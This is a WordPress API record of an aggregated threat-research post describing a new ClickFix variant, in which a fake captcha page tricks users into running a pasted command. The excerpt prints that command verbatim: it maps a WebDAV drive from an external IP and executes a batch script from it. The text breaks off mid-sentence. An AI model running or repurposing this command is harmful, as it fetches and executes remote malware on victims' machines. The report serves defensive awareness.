{"id":223625,"date":"2026-03-13T09:28:00","date_gmt":"2026-03-13T13:28:00","guid":{"rendered":"https:\/\/news-you-need.com\/index.php\/2026\/03\/13\/investigating-a-new-click-fix-variant\/"},"modified":"2026-03-14T15:15:07","modified_gmt":"2026-03-14T19:15:07","slug":"investigating-a-new-click-fix-variant","status":"publish","type":"post","link":"https:\/\/news-you-need.com\/index.php\/2026\/03\/13\/investigating-a-new-click-fix-variant\/","title":{"rendered":"Investigating a New Click-Fix Variant"},"content":{"rendered":"<p><a href=\"https:\/\/thehackernews.com\/2026\/03\/investigating-new-click-fix-variant.html\">Investigating a New Click-Fix Variant<\/a><\/p>\n<p><a href=\"https:\/\/thehackernews.com\/2026\/03\/investigating-new-click-fix-variant.html\">https:\/\/thehackernews.com\/2026\/03\/investigating-new-click-fix-variant.html<\/a><\/p>\n<p>Publish Date: <a href=\"publish_date]\">2026-03-13 09:28:00<\/a><\/p>\n<p>Source Domain: <a href=\"thehackernews.com\">thehackernews.com<\/a><\/p>\n<p><strong>Disclaimer<\/strong>: This report has been prepared by the Threat Research Center to enhance cybersecurity awareness and support the strengthening of defense capabilities. It is based on independent research and observations of the current threat landscape available at the time of publication. The content is intended for informational and preparedness purposes only.<\/p>\n<p>Read more blogs around threat intelligence and adversary research: https:\/\/atos.net\/en\/lp\/cybershield<\/p>\n<h4 style=\"text-align: left;\"><strong>\u00a0Summary<\/strong><\/h4>\n<p>Atos Researchers identified a new variant of the popular ClickFix technique, where attackers convince the user to execute a malicious command on their own device through the Win + R shortcut. In this variation, a \u201cnet use\u201d command is used to map a network drive from an external server, after which a \u201c.cmd\u201d batch file hosted on that drive is executed. Script downloads a ZIP archive, unpacks it, and executes the legitimate WorkFlowy application with modified, malicious logic hidden inside \u201c.asar\u201d archive. This acts as a C2 beacon and a dropper for the final malware payload.<\/p>\n<table cellpadding=\"0\" cellspacing=\"0\" class=\"tr-caption-container\" style=\"float: left;\">\n<tr>\n<td style=\"text-align: center;\"><img decoding=\"async\" alt=\"\" border=\"0\" data-original-height=\"251\" data-original-width=\"819\" src=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEgI3trtAac3m4CbyOoWlIcWGgQJbB2hIcdMKsrtWT9acSAAUs3llaXtiuIbYzhI4HGptQBTHZnlKN9nfuQ22yM8mszDKFZzuMHd0TqbcOngBgYC6Lr21yD6O8bXQwO-6e8TI6hq_ip3wpUkEkWWz4JdsmgcgC0s7jDisLY2RZ1marb9m2DEIHvHNpH-oxzV\/s1600\/1.png\"\/><\/td>\n<\/tr>\n<tr>\n<td class=\"tr-caption\" style=\"text-align: center;\">Figure 1: High-level overview of attack flow.<\/td>\n<\/tr>\n<\/table>\n<h2 style=\"text-align: left;\">Attack overview<\/h2>\n<p>In this version, the initial vector of attack is the same as in all the other ones, a web page posing as a captcha mechanism \u2013 \u201chappyglamper[.]ro\u201d. It prompts the user to open the Run application via \u201cWin+R\u201d, followed by \u201cCtrl+V\u201d and \u201cEnter\u201d<\/p>\n<table cellpadding=\"0\" cellspacing=\"0\" class=\"tr-caption-container\" style=\"float: left;\">\n<tr>\n<td style=\"text-align: center;\"><img decoding=\"async\" alt=\"\" border=\"0\" data-original-height=\"601\" data-original-width=\"859\" src=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEhVCV5rgx3oWMp5a4WXJ3NP57gv655-dINgkx4LRLg8lwamGFhO1hFqFun_3KGsnLpGe5lI637hSaEb7GoR1odH6M2HRFTKEVOl33_PEVYhKvKM9J-4BdBGys59SX-X38WWHQH9i81cK_P8rnjm6QDfUZfe8vtLlciT8rrlga1l0f2VBEXyI6OJeQzYNjof\/s1600\/2.png\"\/><\/td>\n<\/tr>\n<tr>\n<td class=\"tr-caption\" style=\"text-align: center;\">Figure 2: Phishing website 1<\/td>\n<\/tr>\n<\/table>\n<table cellpadding=\"0\" cellspacing=\"0\" class=\"tr-caption-container\" style=\"float: left;\">\n<tr>\n<td style=\"text-align: center;\"><img decoding=\"async\" alt=\"\" border=\"0\" data-original-height=\"552\" data-original-width=\"855\" src=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEi7sCd3P7-nA23PlNtVj_aKDRcMNCRC5BGg6HbuBawoSAQsOUXlQswhyKvafeNK457Gn6EFnXxD-nJgW-DQDg97bfYivG_ymb2KKHR8EL9K_AYtPb5k_2P7sClDst1ujYhM_ZBs3kIhKmlQvBpGGoth6w5oyi8GrDsGrSVW_uDcV25Sgn7gCxMYTc7aQyjt\/s1600\/3.png\"\/><\/td>\n<\/tr>\n<tr>\n<td class=\"tr-caption\" style=\"text-align: center;\">Figure 3: Phishing website 2<\/td>\n<\/tr>\n<\/table>\n<p>This executes the following command:<\/p>\n<p>\u201ccmd.exe\u201d \/c net use Z: http:\/\/94.156.170[.]255\/webdav \/persistent:no &#038;&#038; \u201cZ:update.cmd\u201d &#038; net use Z: \/delete<\/p>\n<p>Typically, at this stage, attackers have used PowerShell or mshta to download and execute the next stage of the malware. Here, instead, we can see that \u201cnet use\u201d is being used to map and connect to a network drive of an external server from which a Batch script is executed. While not novel, these TTPs were never seen in ClickFix attacks before. Combined with the next uncommon stages of&#8230;<\/p>\n<p><a href=\"https:\/\/thehackernews.com\/2026\/03\/investigating-new-click-fix-variant.html\">Source<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Investigating a New Click-Fix Variant https:\/\/thehackernews.com\/2026\/03\/investigating-new-click-fix-variant.html Publish Date: 2026-03-13 09:28:00 Source Domain: thehackernews.com Disclaimer: This&#8230;<\/p>\n","protected":false},"author":1,"featured_media":223626,"comment_status":"closed","ping_status":"","sticky":false,"template":"","format":"standard","meta":{"fifu_image_url":"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEgAy3Jm9mBV4SvNdfv5AJ_ZIKoJSwtUVeXkiFUNwKFUN3F5j3kYJTpD1a65PEcgqX2cMT0DmtJJ7YCrYuhElQ9nhYtQkXRtQxnkpOqTgSUOCAJgO8Lv8HDWZxVuy74vgjErtUYrHPH-UrWLfLoL18i__L9a-6T1xdgMPjsTamIOab3KGcJE3kzxz5aR8tm8\/s1600\/eviden.jpg","fifu_image_alt":"","footnotes":""},"categories":[15],"tags":[24,32,25],"class_list":["post-223625","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-cybersecurity","tag-cybersecurity","tag-malware","tag-phishing"],"_links":{"self":[{"href":"https:\/\/news-you-need.com\/index.php\/wp-json\/wp\/v2\/posts\/223625"}],"collection":[{"href":"https:\/\/news-you-need.com\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/news-you-need.com\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/news-you-need.com\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/news-you-need.com\/index.php\/wp-json\/wp\/v2\/comments?post=223625"}],"version-history":[{"count":1,"href":"https:\/\/news-you-need.com\/index.php\/wp-json\/wp\/v2\/posts\/223625\/revisions"}],"predecessor-version":[{"id":223627,"href":"https:\/\/news-you-need.com\/index.php\/wp-json\/wp\/v2\/posts\/223625\/revisions\/223627"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/news-you-need.com\/index.php\/wp-json\/wp\/v2\/media\/223626"}],"wp:attachment":[{"href":"https:\/\/news-you-need.com\/index.php\/wp-json\/wp\/v2\/media?parent=223625"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/news-you-need.com\/index.php\/wp-json\/wp\/v2\/categories?post=223625"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/news-you-need.com\/index.php\/wp-json\/wp\/v2\/tags?post=223625"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}